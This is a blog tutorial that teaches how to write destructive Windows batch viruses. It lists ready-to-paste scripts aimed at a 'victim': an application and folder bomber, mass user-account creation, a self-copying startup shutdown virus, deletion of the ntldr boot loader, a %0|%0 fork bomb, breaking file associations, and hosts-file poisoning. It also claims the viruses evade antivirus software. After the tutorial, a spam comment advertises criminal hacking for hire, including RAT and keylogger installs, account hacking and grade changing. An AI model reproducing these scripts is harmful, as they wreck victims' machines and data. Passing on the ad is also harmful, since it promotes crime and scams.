Batch Files - the Art of Creating Viruses
Just paste the codes in notepad and
save files with extension .bat and your deadly batch viruses would be ready.
But instead of that, let’s focus on making the basics of batch files clear and
developing the approach to code your own viruses.
Let’s begin with a simple example ,
Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one
1.
md x //makes directory 'x' on desktop
2.
cd x // changes current directory to 'x'
3.
md y // makes a directory 'y' in directory 'x'
Now delete the folder 'x'.
Let’s do the same thing in another
way. Copy these three commands in notepad and save file as anything.bat
So a batch file is simply a text
containing series of commands which are executed automatically line by line
when the batch file is run.
What can
batch viruses do?
They can be used to delete the
windows files,format data,steal information,irritate victim, consume CPU
resources to affect performance,disable firewalls,open ports,modify or destroy
registry and for many more purposes.
Now let’s start with simple codes,
Just copy the code to notepad and save it as anything.bat (Name can be anything
you wish but extension must be bat and save it as 'all files' instead of text
files).
Note: Type 'help' in command prompt
to know about some basic commands and to know about using a particular command
, type 'command_name /?' without quotes.
1.Application
Bomber
@echo off // It instructs to hide
the commands when batch files is executed
:x //loop variable
start winword
start mspaint
//open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start
open different applications like paint,notepad,command prompt repeatedly,
irritating victim and ofcourse affecting performance.
2.
Folder flooder
@echo off
:x
md %random% // makes
directory/folder.
goto x
Here %random% is a variable that
would generate a positive no. randomly. So this code would make start
creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user
account
goto x
This code would start creating
windows user accounts whose names could be any random numbers.
4.Shutdown
Virus
copy anything.bat “C:\Documents and
Settings\All Users\Start Menu\Programs\Startup” //these two
commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will
shutdown the computer in 0 seconds
Note : Files in Start up folder gets started automatically when
windows starts . You should first two lines of code in every
virus code so that it would copy itself in startup folder. Start up folder path
in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
Everytime the victim would start the
computer, the batch file in start up would run and shutdown the computer
immediately. You can remove this virus by booting the computer in Safe Mode and
deleting the batch file from Start Up folder.
5.
Deleting boot files
Goto C drive in Win XP ,
Tools->Folder Option->View
Now Uncheck the option 'Hide
operating system files' and check option 'Show hidden files and folders'. Click
apply
Now you can see the operating system
files. There is a one file 'ntldr' which is boot loader used to boot the
windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not reboot and a normal victim would definitely install the windows again.
%0|%0 //Its percentage zero
pipe percentage zero
This code creates a large number of
processes very quickly in order to saturate the process table of windows. It
will just hang the windows
.
7.
Extension Changer
@echo off
assoc .txt=anything // this
command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a
filetype like extension ‘exe’ is is associated with filetype ‘exefile’.
To see them, just enter command ‘assoc’ in command prompt.
Above code changes the
association of some extensions to filetype ‘anything’ (means u can write
anything) which obviously doesn’t exist. So all exe (paint,games,command prompt
and many more),jpeg,png,mpeg files wudn’t open properly.
8.
DNS Poisoning
There is a file called ‘hosts’
located at c:\windows\system32\drivers\etc. We can place a website and an IP in
front of it. By doing this, we want our web browser to take us to host located
at that IP when that website name would be entered. I mean request to resolve
IP of website is not sent to Domain Name Server(DNS) if the name of website in
hosts file.
@echo off
echo xxx.xxx.xxx.xxx
www.anything.com > C:\windows\system32\drivers\etc\hosts //this
command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.
You can take/redirect victim to any
host located at specific IP when he wud try to log on to specific website or u
can simply block any website by entering its name and any invalid IP address.
Note : Most of the batch viruses are
simply undetectable by any anitiviruses
Tip : Coding good viruses just
depends on the DOS commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in
notepad.
2.The command prompt screen pops up,it alerts the victim and
he can stop it.
To overcome these limitations,we
need to convert these batch files into executable files that is exe files.
Need The To Hire A Hacker❓ Then contact PYTHONAX✅
ReplyDeleteThe really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.
We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.
Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
We perform every Hack there is, using special Hacking tools we get from the dark web.
Some list of Hacking Services we provide are-:
▪️Phone Hacking & Cloning ✅
▪️Computer Hacking ✅
▪️Emails & Social Media Account Hacking✅
▪️Recovering Deleted Files✅
▪️Tracking & Finding People ✅
▪️Hunting Down Scammers✅
▪️Hack detecting ✅
▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
OTHER SPECIAL HACKING SERVICES
▪️Binary Option Recovery ✅
▪️Scam Money Recovery✅
▪️Bitcoin Multiplication✅
▪️Change Of Grades In Universities/Colleges ✅
▪️Phone Calls Monitoring✅
▪️keyLogging Installation✅
▪️Remote Access Trojan (RAT) installation ✅
▪️Cyber Security Upgrade✅
▪️And lots more...........
Whatever Hacking service you require, just give us an Email using the Emails Address provided below.
pythonaxhacks@gmail.com
pythonaxservices@gmail.com
PYTHONAX.
2020 © All Right Reserved.